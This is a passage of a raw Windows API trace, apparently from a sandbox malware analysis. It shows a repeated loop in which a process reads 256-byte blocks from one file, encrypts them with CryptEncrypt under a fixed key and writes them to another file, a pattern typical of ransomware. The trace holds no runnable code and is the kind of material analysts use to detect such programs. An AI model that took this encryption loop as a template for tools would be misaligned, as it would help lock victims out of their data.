pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.504] GetLastError () returned 0x0 [0148.504] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.504] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.504] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.504] GetLastError () returned 0x0 [0148.504] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.504] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.504] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.504] GetLastError () returned 0x0 [0148.504] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.504] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.504] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.504] GetLastError () returned 0x0 [0148.504] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.505] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.505] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.505] GetLastError () returned 0x0 [0148.505] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.505] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.505] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.505] GetLastError () returned 0x0 [0148.505] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.505] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.505] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.505] GetLastError () returned 0x0 [0148.505] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.505] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.505] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.505] GetLastError () returned 0x0 [0148.505] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.505] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.505] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.505] GetLastError () returned 0x0 [0148.505] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.505] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.505] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.505] GetLastError () returned 0x0 [0148.505] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.505] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.506] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.506] GetLastError () returned 0x0 [0148.506] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.506] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.506] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.506] GetLastError () returned 0x0 [0148.506] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.506] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.506] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.506] GetLastError () returned 0x0 [0148.506] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.506] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.506] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.506] GetLastError () returned 0x0 [0148.506] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.506] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.506] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.506] GetLastError () returned 0x0 [0148.506] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.506] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.506] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.506] GetLastError () returned 0x0 [0148.506] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.506] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.506] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.506] GetLastError () returned 0x0 [0148.506] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.507] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.507] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.507] GetLastError () returned 0x0 [0148.507] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.507] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.507] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.507] GetLastError () returned 0x0 [0148.507] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.507] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.507] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.507] GetLastError () returned 0x0 [0148.507] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.507] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.507] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.507] GetLastError () returned 0x0 [0148.507] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.507] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.507] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.507] GetLastError () returned 0x0 [0148.507] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.507] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.507] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.507] GetLastError () returned 0x0 [0148.507] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.508] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.508] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.508] GetLastError () returned 0x0 [0148.508] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.508] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.508] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.508] GetLastError () returned 0x0 [0148.508] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.508] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.508] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.508] GetLastError () returned 0x0 [0148.508] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.508] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.508] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.508] GetLastError () returned 0x0 [0148.508] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.508] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.508] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.508] GetLastError () returned 0x0 [0148.508] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.508] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.508] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.509] GetLastError () returned 0x0 [0148.509] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.509] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.509] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.509] GetLastError () returned 0x0 [0148.509] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.509] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.509] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.509] GetLastError () returned 0x0 [0148.509] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.509] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.509] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.509] GetLastError () returned 0x0 [0148.509] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.509] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.509] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.509] GetLastError () returned 0x0 [0148.509] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, 